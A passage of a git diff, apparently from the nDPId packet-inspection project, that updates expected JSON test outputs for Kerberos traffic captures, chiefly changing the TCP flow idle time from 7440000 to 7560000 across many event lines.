u3gyZ4w550hPMwNPtwT50N8oSP0YzMlcdyjS0yGxX38Sztfi6maarSaN8R8bO1fNlv7DMT0XFldAA9Ujo2zbz4RI5ls2TDkFYA60ukMDSLX5c+pTDKFVkARApYRvSaMnKg1aCCWfstO5zat+wIz45gQKBeA3dPJACT5hwG+Q1qc="} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":25,"packets-processed":24,"total-skipped-flows":0,"total-l4-data-len":29024,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":12,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":51,"global_ts_msec":946724453221} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946724453221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946724453221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"uKxvNgTjGGbam+N9CABFAAA8DbNAAIAGV6nAqAoDwKgKDABYrOCOu9eK+5UIh6ASIAAObgAAAgQFtAEDAwgEAggKM1tACf\/++SE="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946724453221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} -00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":1555,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":""}} -00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":4664,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":"ubuntu64a"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946724453221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946724453221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"uKxvNgTjGGbam+N9CABFAAA8DbNAAIAGV6nAqAoDwKgKDABYrOCOu9eK+5UIh6ASIAAObgAAAgQFtAEDAwgEAggKM1tACf\/++SE="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946724453221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} +00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":1555,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":""}} +00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":4664,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":"ubuntu64a"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":180000,"flow_min_l4_payload_len":1189,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2400,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":180000,"flow_min_l4_payload_len":1192,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":2415,"flow_avg_l4_payload_len":1207,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067473,"flow_last_seen":946716067513,"flow_idle_time":180000,"flow_min_l4_payload_len":1205,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":1212,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} @@ -67,7 +67,7 @@ 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140238,"flow_last_seen":946716140238,"flow_idle_time":180000,"flow_min_l4_payload_len":1182,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2393,"flow_avg_l4_payload_len":1196,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1090,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":180000,"flow_min_l4_payload_len":1228,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":2463,"flow_avg_l4_payload_len":1231,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":180000,"flow_min_l4_payload_len":1202,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":2423,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":6218,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":6218,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":39,"packets-processed":39,"total-skipped-flows":0,"total-l4-data-len":35242,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":13,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":71,"global_ts_msec":946724453222} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 39/39 diff --git a/test/results/kerberos.pcap.out b/test/results/kerberos.pcap.out index b5029adc4..3d7a9f500 100644 --- a/test/results/kerberos.pcap.out +++ b/test/results/kerberos.pcap.out @@ -1,194 +1,194 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"kerberos.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1549337929790} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00774{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337929790,"pkt":"pB9ywglqAAgCHEeuCABFAAEXABdAAIAGkNisEAjJrBAICMAFAFiynbRHbznTnlAYAQAf5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDmhhcHB5Y3JhZnQub3JnoyMwIaADAgECoRowGBsGa3JidGd0Gw5oYXBweWNyYWZ0Lm9yZ6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7AFheoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} -00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337929790,"pkt":"AAgCHEeupB9ywglqCABFAAE+ExRAAIAGfbSsEAgIrBAIyQBYwAVvOdOesp21NlAYAQCkkQAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDBjUgpgMCARmpEBsOaGFwcHljcmFmdC5vcmeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} -00729{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337929811,"pkt":"pB9ywglqAAgCHEeuCABFAAFnABtAAIAGkISsEAjJrBAICMAGAFganBtaQ2U1slAYAQDaGgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4YERcga5zFfjuo7+oqo0hJ6Udj7efOwOKKYJj6PKpxuETgzDcdt27IvGW9sEQ18QPUV\/drVuLVBwwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOaGFwcHljcmFmdC5vcmejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETsAWF6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1549337929812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337929812,"pkt":"AAgCHEeupB9ywglqCABFAACYExlAAIAGflWsEAgIrBAIyQBYwAZDZTtmGpwcmVAYAQDnsgAAX5hri3Z\/opje40K53kwDKo2\/CTegm0pJkWpLVNFlnn\/MakUFXqKHv4CDtH2CbQqvJq\/ecJgxH2EwrzVmUcQk2zqXXjIwbkyszZ9\/Xc6IEgQ4qiI64lPzINS7ueVTbdUXk\/8v52QxoGdMilBjjWTAcQ=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337929815,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337929815,"pkt":"pB9ywglqAAgCHEeuCABFAACxACFAAIAGkTSsEAjJrBAICMAHAFgBsoC8gS4auFAYAQDUqQAAiNeE+tCJIo9Cz1KFHGicigIlxkFIEVkb70vifDKvvi6NwB24GlkehWdocuUvESpeAqtSofWtuKDm2yskVOheE+r4DxaQxRLncJy9zYBP+p7ofQvBukmarkg+oY3ctA8jgj5BSy2yi42NlxJjhcjuX3ByLG+GD20zq41Le0TbPh0TFS5qkRb0Q24="} -00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337929815,"pkt":"AAgCHEeupB9ywglqCABFAACbEx9AAIAGfkysEAgIrBAIyQBYwAeBLiBsAbKBRVAYAQBP\/wAA1H56bb56rLTzhI\/so6pGl6jILu03bHY2ZWl4A41JY07Kavo1sQRKhlNPx3vE\/LdSF6BX6NLW1Fm3Tdmvr7ZEbPWOq8FZs9c0RBY7wJbwPUW44FlC0vhqJn1yGB3K1Fxl0gPqAAMzMrhupJQMQzjV4fgdag=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337929816,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/ACZAAIAGjCGsEAjJrBAICMAIAFgkzleN\/pyBM1AYAQCd1QAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1l4LwpNuTjPo\/WSca61wgawIInNQ2vTGqwCxtV1QigPfApKXxUIq16oPsvd5TUFFBoZ3psSaal0IeVBLFx\/BX1XOMXvlpVRB9MsTpZwTQ9ax1GLB6I2i5bbUZpknsnBAKrSXL695P06nXI2pxBPckcoFwJAlSBEmG2XByE8IS7rO1EarXMbJ6Y6aTY3qAJfaaRab4vHhRG2Vuf+5JWuR5w1NLPXeeoD\/rArSk0gCVLkR21SKfZcS\/vqPldqO0np7TLmMBVoYjsl6PiI0+4z2cMBft\/qbxRIxb8y1vWhjoJ64ue7lCoT2cvFOdVWD\/WH\/fANzw0ML9F0vLIXCgI1qi1sWcerxATeYpOyo7DWpsJioH9jxAPx+B6RM+9U5zQIKM9BdT3C3olrkQMfOua6FPtyqIt9kVcakdowBTS4+NidzK5sGlYIRntlAxGR8YU5brzwGdboEMfsAHK11qtTE6t\/tDmgr1+cFgW34p7q9yjtfw3IlMfNtNF6cVYmOh6G5Wnxcfjqbsrpj7Kw6mjBwfKtaYNJG6XthlVKo9I4FpdysFIteChs2N+mQtafp0AWZxKjjDKO8sohbJklYhyoJOto52hds26FAU4LmrIc5fMmADp1PG\/tBDi0BnZ3SimtoeWyM2fnwWhBrH67G